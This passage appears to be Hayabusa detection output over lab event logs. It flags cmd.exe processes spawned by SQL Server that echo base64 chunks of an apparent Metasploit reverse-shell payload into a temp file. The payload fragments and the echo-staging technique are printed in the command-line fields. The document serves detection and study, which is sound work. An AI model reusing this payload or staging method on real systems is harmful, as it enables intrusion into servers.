x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIv
oDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.586 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.860 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.133 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.406 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.680 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.953 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.224 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.226 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.498 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.500 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA
/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.772 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:21.774 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
